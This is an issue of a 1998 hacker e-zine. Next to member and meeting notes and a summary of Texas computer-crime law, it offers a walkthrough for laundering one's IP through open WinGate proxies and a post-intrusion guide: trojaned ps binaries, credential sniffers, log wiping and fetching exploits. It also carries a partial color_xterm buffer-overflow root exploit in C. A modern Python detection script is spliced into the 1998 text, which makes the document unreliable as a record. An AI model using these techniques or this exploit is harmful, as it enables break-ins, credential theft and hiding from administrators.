                     Computer Academic Underground
                          Electronic Magazine
                                 #0015
                               0115.98

##############################################################################
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
==============================================================================
------------------------------------------------------------------------------
..............................................................................

Table of Contents

Foreword

General
  Member Listing                          -= CAU =-
  817 2600 Meeting                        -= CAU =-
  What is Skill?                          I)ruid
  Computer Crimes And The Law             MajestiX
  UNIX Software Review                    Protocol

Hacking
  WinGate by Association                  Variety
  I)ruid's Novice Corner                  I)ruid
  Exploit of the Month                    -= CAU =-

Phreaking

Closing

##############################################################################

Foreword

I love how this month's Hacking section seems to go in order... How to get to a system safely (WinGate By Association), what to do once you're there (I)ruid's Novice Corner), and how to bust root (Exploit of the Month). That worked out quite nicely this month, didn't it? However, the tradeoff is that we have NO phone related articles for the Phreak section this month... maybe someone will contribute one next month. But anyway, go read, there's some good stuff in here.
I)ruid

##############################################################################

General

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Member Listing

(In the order in which they were brought into the CAU)

Handle               IRC Nick       E-Mail
--------------------------------------------------------------
I)ruid               I}ruid         druid@caughq.org
Ultra Violet         uv_            uv@caughq.org
Crimson Assassin     Crimson_A      crimson@caughq.org
Fizban               Fizban^        fizban@caughq.org
Sublime              sublime        sublime@caughq.org
int3l                int3l          int3l@caughq.org
MajestiX             maJesTix       majestix@caughq.org
--------------------------------------------------------------

-= CAU =-

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

817 2600 Meeting

First Friday of Every Month
6:00pm until 9:00pm

Cafe Cybre
481 Harwood Road
Hurst, Texas
Phone: METRO: 817.268.0060

"It's what's fer dinner!"

-= CAU =-

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

What is Skill?

Alright, I'm sick and tired of hearing about who has how much skill and who doesn't. I'm gonna tell you all /MY/ definition of skill, which will probably not match anyone else's definition of skill, especially the warez-hoar's definitions, the skript-kiddie's definitions, etc. No one knows what skill really means, yet everyone's always all too ready to say they have more 'skill' than someone else.

First of all, 'skill' isn't how many scripts you own. Or how many exploits you can hoard. Or how many gigs of warez you have. If that is your definition of 'skill' then you're in for a BIG disappointment in this article.

To me, 'skill' is exactly what the word means. It means that you are skilled at something. Now if you consider flaunting around the internet collecting scripts a skill, then yes, you are skilled at something very very lame and pointless. When the term 'skill' is used in reference to hacking, it means exactly that: you are skilled at hacking.
Collecting every exploit known to man is not a skill, it's a lame attempt at being skilled. Being skilled at hacking is being able to come up with NEW and INVENTIVE things, not copying other people's exploit code, taking other people's skripts and using them to make you seem 'elite', or trading warez for shell accounts that you supposedly 'hacked'. NEW and INVENTIVE things will get you respect. NEW and INVENTIVE things will show that you have skill. Also, dedication and HARD WORK (something a lot of you know nothing about) show that you have skill. Also, if you think that sp3ll1ng w1th numb3rs makes you look like you have skill, you're wrong. It just makes you look like a damn fool, unless there is a reason for the numbers.

If you haven't gotten the picture by now, let me break it down for you with a few examples. Take int3l for example. int3l is probably one of the most skilled people I know. He has done stuff with phones, computers, anything, you name it, that I would have never thought possible. And he doesn't give up like a lot of you little skript kiddies do. If he couldn't do something, he kept trying, and trying, and trying until he DID it. Another example is Crimson Assassin. Crim refuses to believe that he can't learn something. If he needs to set something up, he sits down and LEARNS how to do it. He doesn't go out and try to find someone to do it for him, HE does it. THAT is skill. Crim is also probably one of the few skilled people I know.

If you don't have this type of skill, you will never be anything more than a skript kiddie, an exploit hoar, or a warez pup. That's all there is to it. Anyway, those are my views on so-called 'skill', so I'll get off my soap box now and go on with my life. And just remember, each and every member of CAU is skilled. If they weren't, they would never even have been considered at all to be brought into the CAU.
I)ruid

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Computer Crimes and the Law

Well, one night I was sitting in IRC doing nothing (as usual) and got this strange urge to write an article for the zine (cau-0015), and this was even before 14 was released. And, if you were in IRC at the time, you will remember me asking for some article ideas, and I recalled my old political stage. So I thought of this topic, and I went and pulled up all my old "Computer Laws" files, including:

    VERNON'S TEXAS STATUTES AND CODES ANNOTATED
    COPR. (c) WEST 1990 No Claim to Orig. Govt. Works
    PENAL CODE
    TITLE 7. OFFENSES AGAINST PROPERTY
    CHAPTER 33. COMPUTER CRIMES

These particular statutes and other codes are for Texas, but you can relate the same consequences to your area, I'm sure. As the "internet population" increases, more and more incidents will be made and filed. I'm sure you have read a couple newspaper articles dealing with some kind of computer crime or another. Recent cases which I'm sure you can recall are the Ed Cummings (Bernie S.) and, of course, the good ole' Kevin Mitnick cases. The case with Ed Cummings doesn't really tie in with the whole computer crime idea, but in a sense it is very much related. The Kevin Mitnick case on the other hand was a great relation with computer crimes in general.

Anyways, enough of this jibber-jabberish bullshit lingo jingo, John Grisham bullshit. Let's get down to the details. Basically, like most situations, there are The Situation and The Consequence. Simple concept, but it gets much more complex as it is examined. Now, as I said before, LET'S GET TO THE DAMN DETAILS! Alright, I will break it down into "simple concepts."
Harmful Access is considered to be:

  (a) A person commits an offense if the person intentionally or knowingly
      and without authorization from the owner of the COMPUTER or a person
      authorized to license access to the COMPUTER:
      (1) damages, alters, or destroys a COMPUTER, COMPUTER program or
          software, COMPUTER system, data, or COMPUTER network;
      (2) causes a COMPUTER to interrupt or impair a government operation,
          public communication, public transportation, or public service
          providing water or gas;
      (3) uses a COMPUTER to:
          (A) tamper with government, medical, or educational records; or
          (B) receive or use records that were not intended for public
              dissemination to gain an advantage over business competitors;
      (4) obtains information from or introduces false information into a
          COMPUTER system to damage or enhance the data or credit records of
          a person;
      (5) causes a COMPUTER to remove, alter, erase, or copy a negotiable
          instrument; or
      (6) inserts or introduces a COMPUTER virus into a COMPUTER program,
          COMPUTER network, or COMPUTER system.

  (b) An offense under this section is a:
      (1) felony of the second degree if the value of the loss or damage
          caused by the conduct is $20,000 or more;
      (2) felony of the third degree if the value of the loss or damage
          caused by the conduct is $750 or more but less than $20,000; or
      (3) Class A misdemeanor if the value of the loss or damage caused by
          the conduct is $200 or more but less than $750.

Basically, it looks like a bunch of shit, I know, but it's really not. Read it, and it is self-explanatory. All it is really saying is, the more damage caused by the conduct, the more you're fucked over. Yes, that is of course fair, *regardless* of the situation. But! The part that isn't fair is, the court system isn't fair, and the network you either accidentally or purposely damaged isn't fair either. Remember kids, the second a system/network detects an "intruder" or a problem, they don't have to call big brother right away; hell, they can wait a couple months.
You know what advantage this gives them? Yup, false evidence. Trust me, when you hurt a System Admin's ego, you hurt his whole reputation. And Admins do NOT like to have their reputation hurt. Which means they're gonna fuck you over in any way they can. In a way you deserve it, but only to a certain degree. So, what can you do to defend yourself against this kind of mess? Simple: hire a good ass lawyer, Robert Shapiro, etc., and get yourself a defense fund. It's simple and inexpensive. Also, check out http://www.hackerz.org and they will probably be able to help you out in some way or another.

Well, the above statutes cover a general range of "harmful computer activities." So, now let's cover the simple computer crime, unauthorized (attempted or successful, doesn't matter) access areas. So here I go, break it down!

  (1) An offense may be prosecuted in: the county of the principal place of
      business of the owner or lessee of a COMPUTER, COMPUTER system, or
      COMPUTER network involved in the violation.

Basically, that's saying, well, if you're in Texas, and you harm/violate (yes, you can rape a computer) a computer in, let's say... Washington D.C., the System Admin/Representative can hold the trial in Washington D.C. Now, there are waivers that can be made during the beginning of the trial to alter this.

  (2) A person commits an offense if the person:
      (A) uses a COMPUTER without the effective consent of the owner of the
          COMPUTER or a person authorized to license access to the COMPUTER
          and the actor knows that there exists a COMPUTER security system
          intended to prevent him from making that use of the COMPUTER; or
      (B) gains access to data stored or maintained by a COMPUTER without
          the effective consent of the owner or licensee of the data and the
          actor knows that there exists a COMPUTER security system intended
          to prevent him from gaining access to that data.
Well, this is saying that a person who uses a COMPUTER without the consent of the owner, or consent of a homie who has consent of the owner, is committing an offense and therefore can be prosecuted with reasonable evidence provided by the prosecutor. Then, after that, it says that anyone who accesses stored data without the consent of the owner, or consent of the homie who has consent of the owner, can be prosecuted.

  (3) A person commits an offense if the person intentionally or knowingly
      gives a password, identifying code, personal identification number,
      debit card number, bank account number, or other confidential
      information about a COMPUTER security system to another person without
      the effective consent of the person employing the COMPUTER security
      system to restrict the use of a COMPUTER or to restrict access to data
      stored or maintained by a COMPUTER.

Again, this is saying that if a person gives another person any system mandatory information such as a passwd, etc., he can be prosecuted. Or, if he gives any financial data (which, not to mention, is a Federal Offense) or any other financial related data, that person too can be prosecuted.

  (4) An offense under this section is a Class A misdemeanor.

Last but not least, any of the top 3 offenses will be dealt with as a Class A misdemeanor, which really is nothing at all, unless the COMPUTER system/network has false evidence; then it (the consequence, that is) can be GREATLY increased. Not to mention, most computer related crimes are becoming federal offenses, which means more felonies for your record.

Closing: well, the statutes were pretty self-explanatory as mentioned before, but I just wanted to present this information and explain it, even though it didn't really matter how much I explained it, it was still pretty much the same. All questions, comments and/or death threats proceed to majestix@caughq.org and/or majestix@punkrawk.net.
Thanks,
maJesTix

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Unix Software Review

Well, here we go again. Just thought I'd give a few paragraphs about some of the software I enjoy under Linux.

Most have heard of Enlightenment, but if you have not played with it I highly recommend it. It is a very graphical window manager that is very configurable. It is still under development but is pretty stable. It does suck up your resources (but what were you going to use those for anyway?). I have been using it for about 4 or 5 months now, I think. I switched to AfterStep again for a little bit, but I came back because E is just comfortable to work in. There are several programs that have the same look or feel as E, like Eterm. Eterm is a terminal program that allows a background graphic (nice effect). Also there is Eplus, which is a:

  CD Player
  Clock
  CPU Load Meter
  Network Load Meter
  File System Meter
  Etc. Etc.

It is a good program to have running, although I have had problems compiling all the modules.

Languages First Look

Also with this article I just want to go over some languages and why you might use them. Well, first up is Expect, a language for automating tasks such as making ftp connect to a client machine and d/l files to be backed up, telnet to a list of hosts and check for a wingate prompt :), or any other tasks you can do at a terminal (well, maybe not all, but close). The best way to start is to get the package. Look for the file autoexpect. Autoexpect will start a sub-shell and watch what you type, and make a script when you exit the sub-shell. I think it's script.exp or something. Then just fire up pico or whatever your poison is and edit the sucker. Autoexpect has some command line parameters, but the only one I remember is "-p", which makes the script only match the last line of output. Otherwise, if you do a date command or an ls, it would expect to see the same results as when you first made the script.
If you have written any chat scripts, the send/expect sequence is similar (I don't care for chat too much, but Expect I like).

One last thing this issue: TCL/Tk. TCL/Tk should have come before Expect, because Expect uses TCL. A nice thing that TCL/Tk can do is make a GUI front-end to a command line program (you know you like them, don't try to deny it). It also has interpreters for most platforms, so your code is portable (ha!). Next issue I'll go into more on TCL/Tk.

Guess that's it. CUL8TR...

Protocol (the way to do things)

##############################################################################

Hacking

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

WinGate by Association and Practical Application

Disclaimer Type Thing: By reading any of the following, I, the author, take NO responsibility for your actions. I'm providing this information purely for the sake of knowing; I don't condone, in fact, I forbid you to even consider actually trying any of the things mentioned here. If you don't agree to any of those things, or if you're even thinking about trying something contained hereafter, you'd better just stop reading this article and go sit in the corner.

Well, Christmas is gone, and New Year's over as well by the time this is read, and besides all of the new bugs in Windows95 discovered, the flaw in the Pentium chip, and all of the rest of 97's goodies, one more tips its hat to the hacker society and its sub-hierarchy before the new year. WinGate. The program is originally intended to allow LANs and other networks to share one internet connection and access the internet through it, but the program is flawed in that it doesn't limit that access to merely the local network by default; instead it allows everyone and their grandmother to easily use the service. The bug's discovery is credited to a 15 year old hacker, Joshua E.
Rodd, and more details on the bug, as well as some more information, and even a workaround, can be found at the following sites:

  http://www.ntsecurity.net/security/wingate.htm
  http://www.deerfield.com/wingate/ (WinGate's Homepage)

But anyways, this bug gleans a result close to that of actual IP spoofing, though not quite as versatile: simply laundering your IP address to that of the machine you're exploiting, similar to telnet gateways in effect (as MajestiX pointed out to me). And I truly hope I don't need to go into more detail on its uses... As follows is a sample exploitation, the IP addresses covered to protect the "innocent." Note also, it doesn't require any privileges but the use of telnet. And, Anguish is used to represent the attacker's machine, wingate.relay.com as the wingate machine, and martyr.com as the machine being attacked. Of course, text surrounded by {} is what is being typed by the attacker...

--Begin Example--

Anguish:~# {telnet}
telnet> {op}
(to) {wingate.relay.com 23}
Trying wingate.relay.com...
Connected to wingate.relay.com.
Escape character is '^]'.
WinGate>{blah.martyr.com 23}
Connecting to host blah.martyr.com...Connected

Scapegoats, Martyrs, etc. (blah) (%t)

For anonymous ftp use ftp.martyr.com; use blah.martyr.com for telnet/rlogin

login: {purloined}
Password:
[blah]:/d/purloined> {who |grep purloined}
purloined ttypb June 6 06:00 (wingate.relay.com)

--End Example--

Now then, that example was done in Linux, but is just as easily reproduced in Windows using its default telnet client. Now then, a sum up of that session. First, the telnet program was opened, and port 23 of the relay machine telnetted to (the Telnet/WinGate port). At the 'WinGate>' prompt, the target machine's addy was entered in (it can be in numerals or unresolved form, and the port defaults to 23 if not otherwise specified), and then the WinGate machine connected to the victim. The user logged in, did a who, and lo and behold, look at the apparent originating IP.
Neat, huh? Well, right now you're probably thinking, "Well, there must be some downside, some uncommonly easy way for people abusing this flaw to be traced back to their real IP." But, this is truly a dream come true, because not only is this attack so easy to pull off, the version of WinGate affected by this bug does *not* do any logging.

And now for some obviously less useful applications of this! Using an IRC client with this: first, I'll start with the commands for mIRC and move on to those for BitchX. Start by typing {/server wingate.relay.com 23}, which'll connect your client to the WinGate machine. In mIRC at least, it'll spit a few strings at the prompt, as it's just a dumb program and can't tell an IRC server from the 'WinGate>' prompt, but those are of no consequence. Next, {/raw irc.server.here 6666}, which simply serves to send 'irc.server.here 6666' to the WinGate prompt without letting the client parse the string. It'll hopefully connect, and when it does, you'll probably get nothing returned; if there's a problem, it'll probably just be that the IRC server is out of connections, and that'll disconnect your client with a message, but just reconnect and try again... Now then, you're at the blank part, so type {/raw NICK Nick} to send your nick request to the IRC server, followed by {/raw user variety abc abc :Real Name}. 'abc abc' can be anything you want, it doesn't matter, and just mod the rest to suit your own preferences. And now you're on IRC... /whois yourself and look, your IP is that of the WinGate machine, ooOOoo. Now go and scare all your lame friends with your skills and make them worship ;-)

And next, for an easier method. In mIRC, click Setup->Firewall, and check the 'SOCKS Firewall' box. In the hostname blank, enter the hostname of the WinGate machine, and leave the port at 1080, the default; do not enter anything for a user or password.
Then, choose your IRC server and connect as normal, a much easier and less round-about way of doing things. Though a note on that is that if the WinGate server isn't up, or if you stick in a bad address, etc., then mIRC will *freeze* for a minute or two before it realizes that fact. Just be patient and it'll unfreeze and return the error. And another thing: if the WinGate host you are on has an identd client, your UID (username) will default to what the identd server is already set to, rather than what you tell the IRC server upon connecting (or what your client tells it).

And now, for the BitchX client. First, connect with {/server wingate.relay.com:23}. The :23 is important there, for the way that the client parses connect strings: if there's a space, then it'll interpret that as 1st server: wingate.relay.com, 2nd server: 23, and try and connect to the default IRC port on the wingate server. Next, the client'll again spit out its commands at the 'WinGate>' prompt, but just ignore the error messages, and type {/quote irc.server.here 6666}. Note there the space; it must be there, and don't forget the port. In this client, /quote is the command to send text directly to the server (if you didn't already infer the same). Following that, the WinGate server will respond with 'Connected to irc.server...' or something along those lines, same as with mIRC, so again, respond here with {/quote NICK Nick} followed by {/quote user variety abc abc :Real Name}, and again, 'abc abc' can be anything you'd like.

Credit for the first trick solely belongs to the Unabomber, who also wrote a great document, "The Official 'How to Spoof WinGate' Guide," and yes, this was the background for most of this section of the article (well, excepting the BitchX part). The second trick (with SOCKS) is credited to Matricide and Deth, and thanks go out to them as well for simplifying things, though I feel I should add a comment on that method.
I've heard from numerous places that SOCKS proxies are logged even more so than sendmail, so... use at your own risk. And YES, both of these methods will LAG YOUR IRC CONNECTION (just thought I'd throw that in). All you're still doing is piggybacking a connection from another IP, possibly a PPP connection, so bLeH.

Phew, that was a mouthful, and now on to the brief subject of scanning. For Windows, point your browser at http://members.xoom.com/unabomber/, the home of the Cabral Domain Scanner, a really nice freeware app that does wonders for hunting WinGate servers, along with a few existing ones, some Q&A stuff, and the WinGate spoofing guide aforementioned. For *nix on the other hand, there's a multitude of existing scanners that would do the job, though you will probably be troubled to find one meant specifically for WinGate scanning. Joshua released a homemade one he dubbed "lndrmat", but took it back down 2 days after he released it; just in case you don't believe me, you can find its page at:

  http://www.geocities.com/Heartland/Prairie/2646/lndrmat.html

Also, Joshua has said that he's made the original code available for informational purposes only at his homepage, though I haven't had any luck accessing it quite yet. But if you do, please do me a favor and send me a copy. Anyways, here the link is:

  http://www.roddsite.home.ml.org/lndrmat.html

And, I suppose that wraps this article up. On a parting note, I'd once again like to thank the Unabomber for his great page and utility, along with Matricide and Deth for their contribution. Also, exploit your hearts out, as you can see the possibilities from this, and you know it's going to become about as obsolete as phf is now, but for now it's great fun.
And to think, it was listed at ntsecurity.net on 10/21/97, yes, October 21st, and look how widely known it is now :-P But, lately, things are starting to hit the fan: people are getting g-lined for WinGate attacks, auto-banned, and servers are going down... I was also thinking of adding a short list of WinGate servers to this, but hey, get your own! ;-) Just scan a domain (personally, I'd suggest the Canadian cable modem domains, hint hint), and stay out of trouble, and I hope you're further enlightened after reading this. Questions? Comments? Mail me...

Variety (var1ety@hotmail.com)

[ EDITOR'S NOTE: In response to this article, I'm working on a few utilities that implement this technique, such as a telnet/ftp bouncer, and a HackIt! module to scan for WinGate machines. Look for them soon. ]

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

I)ruid's Novice Corner: Top 10 General Good Ideas (once you're in a system)

In this article, I'm going to go over some general good practice for once you have gotten into a system and are at a shell, preparing to bust root and move on with your life. None of this should be OS specific, just general Unix environment.

1) NO EXCESSIVE COMMAND-LINE - Once you've gotten into a shell, using as little command-line as possible is a good idea. If you need to go to a website such as rootshell to grab an exploit, stuff like:

  18888  6 S    0:00 lynx http://www.rootshell.org

as opposed to:

  18888  6 S    0:00 lynx

tends to show up in process lists. This can also keep stuff like this entry out of your .history file:

  ftp here.are.the.exploits.com

as opposed to:

  ftp

Most applications and utilities allow you to execute them and later enter the target system. So don't get lazy and attempt to do all your steps at once. If you have to do command-line that is noticeable, try putting it in a script, then run the script.
The script will execute all the command-line faster than you could normally, which lessens the chance of it being noticed as you're executing it.

2) DON'T GO BACK TO YOUR OWN MACHINE - This is just generally a good idea, especially if you're on a static IP at the time. If your machine is a dialup dynamic PPP account, you are a little safer, but it's still not a good idea. Any sysadmin with half a clue can go through his logs and check for connections from the hacker back to their own machine to get exploits, etc. The best bet is to get exploits from a well known source, such as rootshell, etc. It's also not a good idea to use your normal dialup account either, since most OSes do log where all incoming connections come from.

3) DON'T CREATE LOGINS - It is much harder to get caught if you are simply using an authorized user's login, rather than one that you created and gave root access to, etc. By using/modifying an existing user, and acting as that user, you are less noticeable. Also, while acting as an authorized user, you can work within that user's home directory, in hidden directories you create. However, while using another user's account, see #4.

4) DON'T INTERACT WITH OTHER USERS - In other words, don't talk to strangers. Don't leave visible files in random users' home directories. Don't pretend to be a user and talk to that user's friends and soil their reputation. Things like this are mean, and unless there's a reason to, you normally do not want to just go around ruining random people's credibility. And aside from that, that user will eventually find out that someone's been acting/talking as him, and will probably inform the System Administrator, resulting in your account being terminated.

5) MASK YOURSELF - (if you have root) Set up trojan binaries, such as ps and w and such, that can hide your login and processes. Many of these modded programs exist for various platforms and are easily obtainable, and normally don't take much to set up.
If root can't see you or what you're doing, he can't notice you.

6) SET UP A SNIFFER - (if you have root) Set up a packet sniffer and allocate some way to retrieve the sniffer logs as anonymously as possible. One good way to retrieve these logs is to set up an anonymous hotmail account, and have cron run a script daily to mail out and then reset the sniffer logs. Sniffers are EXTREMELY useful tools for not only finding out more information about the current system and its users, but for obtaining logins and passwords for other systems as well. There are a wide variety of packet sniffers available on the net, depending on what type of information you want to obtain from a system and what OS that system is running.

7) DON'T ATTACK OTHER SYSTEMS - Unless you want to get noticed, I wouldn't suggest launching pingfloods and other such attacks against any other systems. The System Administrator of the machine getting attacked will surely notice the attack and contact the sysadmin of the machine you're attacking it from, which will probably result in you losing your access to the system.

8) NULL OUT CERTAIN FILES - Before leaving the system, you may want to null out certain files like .history, .bash_history (in the user home directory) by doing an echo > .history, grep -v the syslog, etc. If you don't know what these commands do, sit down and read a Unix book or manpage and learn something.

9) DON'T TRUST LOGINS AND PASSWDS FROM EGYPTIANS - If an Egyptian gives you logins and passwords, don't use them... Just don't. (:

10) DON'T DO ANYTHING STUPID - A particular case comes to mind where an associate who remains nameless was in a system and was echoing "METALLICA SUCKS!!!!" to all the terminals that people were logged in on. Obviously, someone would notice that and inform the System Administrator, or better yet, he could inform himself if he happened to be online under a user account. Don't assume that just because root isn't logged in that root isn't logged in.
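The flip side of the two articles above is what the sysadmin on the target box can actually see. The WinGate session shows up in `who` with the relay host (wingate.relay.com) as its origin, and items 1 and 5 of the Novice Corner rely on ps output being the only view of the process list. The script below is an added example, not code from this zine or its authors: it parses `who` output and flags logins whose origin is a host on an operator-maintained list of known relays, and it cross-checks `ps -e` against the kernel's own /proc listing to catch PIDs a trojaned ps filters out. It assumes a Linux /proc layout and the GNU `who`/`ps` options used; KNOWN_RELAY_HOSTS and every sample line are constructed for illustration.

```python
"""Host-side checks for what the articles above describe, from the admin's
side of the table. Added example; not from the CAU zine. The relay host
list and the SAMPLE_* data are constructed, and main() assumes Linux /proc
plus GNU who/ps."""
import os
import re
import subprocess

# Constructed: relay hosts an operator has seen in earlier incidents.
KNOWN_RELAY_HOSTS = {"wingate.relay.com"}

# Constructed `who` output. The first line mirrors the session in the article.
SAMPLE_WHO = """\
purloined ttypb June 6 06:00 (wingate.relay.com)
alice     ttyp1 Jun  6 08:12 (ws12.lab.example)
bob       ttyp2 Jun  6 08:40
"""

# Constructed `ps -e -o pid=` output from a trojaned ps (pid 4242 is hidden)
# and a constructed /proc listing taken at the same moment.
SAMPLE_PS = "1\n2\n118\n4001\n"
SAMPLE_PROC = ["1", "2", "118", "4001", "4242", "self", "cpuinfo"]

ORIGIN_RE = re.compile(r"\(([^()]+)\)\s*$")


def parse_who(text):
    """Return (user, tty, origin) per line of `who` output. origin is the
    parenthesised host at the end of the line, or None for local logins."""
    sessions = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        m = ORIGIN_RE.search(line)
        sessions.append((fields[0], fields[1], m.group(1) if m else None))
    return sessions


def sessions_via_relays(sessions, relay_hosts=KNOWN_RELAY_HOSTS):
    """Logins whose apparent origin is a host known to act as an open relay.
    The origin is the relay, not the real client, so a hit is a reason to
    contact the relay's owner, not proof of who sat behind it."""
    return [s for s in sessions if s[2] and s[2].lower() in relay_hosts]


def hidden_pids(ps_text, proc_entries):
    """PIDs present in /proc but absent from ps output. A userland trojaned
    ps filters its own output; it cannot filter the kernel's view."""
    shown = {tok for tok in ps_text.split() if tok.isdigit()}
    in_proc = {name for name in proc_entries if name.isdigit()}
    return sorted(int(p) for p in in_proc - shown)


def proc_cmdline(pid):
    """Command line straight from the kernel for a pid that ps does not show."""
    try:
        with open(f"/proc/{pid}/cmdline", "rb") as fh:
            return fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
    except OSError:
        return ""


def main():
    who_out = subprocess.run(["who"], capture_output=True, text=True).stdout
    for user, tty, origin in sessions_via_relays(parse_who(who_out)):
        print(f"{user} on {tty} logged in through known relay host {origin}")

    # List /proc on both sides of the ps call and keep only pids present in
    # both listings, so processes that start or exit meanwhile are not reported.
    before = set(os.listdir("/proc"))
    ps_out = subprocess.run(["ps", "-e", "-o", "pid="],
                            capture_output=True, text=True).stdout
    after = set(os.listdir("/proc"))
    for pid in hidden_pids(ps_out, before & after):
        print(f"pid {pid} is in /proc but not in ps output: {proc_cmdline(pid)!r}")


if __name__ == "__main__":
    main()
```

Run it as root on the host in question. The /proc comparison only catches a replaced ps binary, which is exactly what item 5 describes; a kernel module that hides entries from /proc itself defeats it, and the relay check is only as good as the list you feed it, since the WinGate build discussed above keeps no log of who used it.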
I)ruid

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Exploit of the Month

All right, I haven't seen any really good root-busting exploits lately, and teardrop, bonk, boink, and every other teardrop mod that has come out lately are getting real old, so this month's exploit is an older one, but a good one. In fact, this exploit was the exploit Sublime used to bust root on the CAUGHQ Server before I locked down Xwindows. He's the only person as far as I know to bust root on the CAUGHQ Server, and color_xterm.c is the exploit he used to do it.

--=< snip >

/*
 * color_xterm buffer overflow exploit for Linux with non-executable stack
 * Copyright (c) 1997 by Solar Designer
 *
 * Compile:
 * gcc cx.c -o cx -L/usr/X11/lib \
 *  `ldd /usr/X11/bin/color_xterm | sed -e s/^.lib/-l/ -e s/\\\.so.\\\+//`
 *
 * Run:
 * $ ./cx
 * system() found at: 401553b0
 * "/bin/sh" found at: 401bfa3d
 * bash# exit
 * Segmentation fault
 */

/* Headers (the angle-bracketed names were lost in extraction; restored
 * to match the functions and constants the code uses) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <setjmp.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <sys/reg.h>
#include <sys/wait.h>

#define SIZE1 1200              /* Amount of data to overflow with */
#define ALIGNMENT1 0            /* 0..3 */
#define OFFSET 22000            /* Structure array offset */
#define SIZE2 16000             /* Structure array size */
#define ALIGNMENT2 5            /* 0, 4, 1..3, 5..7 */
#define SIZE3 SIZE2
#define ALIGNMENT3 (ALIGNMENT2 & 3)
#define ADDR_MASK 0xFF000000

char buf1[SIZE1], buf2[SIZE2 + SIZE3], *buf3 = &buf2[SIZE2];
int *ptr;
int pid, pc, shell, step;
int started = 0;
jmp_buf env;

void handler()
{
    started++;
}

/* SIGSEGV handler, to search in libc */
void fault()
{
    if (step < 0) {
/* Change the search direction */
        longjmp(env, 1);
    } else {
/* The search failed in both directions */
        puts("\"/bin/sh\" not found, bad luck");
        exit(1);
    }
}

void error(char *fn)
{
    perror(fn);
    if (pid > 0) kill(pid, SIGKILL);
    exit(1);
}

int nz(int value)
{
    if (!(value & 0xFF)) value |= 8;
    if (!(value & 0xFF00)) value |= 0x100;
    return value;
}

void main()
{
/*
 * A portable way to get the stack pointer value; why do other exploits use
 * an assembly instruction here?!
 */
    int sp = (int)&sp;

    signal(SIGUSR1, handler);

/* Create a child process to trace */
    if ((pid = fork()) < 0) error("fork");
    if (!pid) {
/* Send the parent a signal, so it starts tracing */
        kill(getppid(), SIGUSR1);
/* A loop since the parent may not start tracing immediately */
        while (1) system("");
    }

/* Wait until the child tells us the next library call will be system() */
    while (!started);
    if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH");

/* Single step the child until it gets out of system() */
    do {
        waitpid(pid, NULL, WUNTRACED);
        pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
        if (pc == -1) error("PTRACE_PEEKUSR");
        if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP");
    } while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK));

/* Single step the child until it calls system() again */
    do {
        waitpid(pid, NULL, WUNTRACED);
        pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
        if (pc == -1) error("PTRACE_PEEKUSR");
        if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0)) error("PTRACE_SINGLESTEP");
    } while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK));

/* Kill the child, we don't need it any more */
    if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL");
    pid = 0;

    printf("system() found at: %08x\n", pc);

/* Let's hope there's an extra NOP if system() is 256 byte aligned */
    if (!(pc & 0xFF))
    if (*(unsigned char *)--pc != 0x90) pc = 0;

/* There's no easy workaround for these (except for using another function) */
    if (!(pc & 0xFF00) || !(pc & 0xFF0000) || !(pc & 0xFF000000)) {
        puts("Zero bytes in address, bad luck");
        exit(1);
    }

/*
 * Search for a "/bin/sh" in libc until we find a copy with no zero bytes
 * in its address. To avoid specifying the actual address that libc is
 * mmap()ed to we search from the address of system() in both directions
 * until a SIGSEGV is generated.
 */
    if (setjmp(env)) step = 1; else step = -1;
    shell = pc;
    signal(SIGSEGV, fault);
    do
        while (memcmp((void *)shell, "/bin/sh", 8)) shell += step;
    while (!(shell & 0xFF) || !(shell & 0xFF00) || !(shell & 0xFF0000));
    signal(SIGSEGV, SIG_DFL);

    printf("\"/bin/sh\" found at: %08x\n", shell);

/* buf1 (which we overflow with) is filled with pointers to buf2 */
    memset(buf1, 'x', ALIGNMENT1);
    ptr = (int *)(buf1 + ALIGNMENT1);
    while ((char *)ptr < buf1 + SIZE1 - sizeof(int))
        *ptr++ = nz(sp - OFFSET);               /* db */
    buf1[SIZE1 - 1] = 0;

/* buf2 is filled with pointers to "/bin/sh" and to buf3 */
    memset(buf2, 'x', SIZE2 + SIZE3);
    ptr = (int *)(buf2 + ALIGNMENT2);
    while ((char *)ptr < buf2 + SIZE2) {
        *ptr++ = shell;                         /* db->mbstate */
        *ptr++ = nz(sp - OFFSET + SIZE2);       /* db->methods */
    }

/* buf3 is filled with pointers to system() */
    ptr = (int *)(buf3 + ALIGNMENT3);
    while ((char *)ptr < buf3 + SIZE3 - sizeof(int))
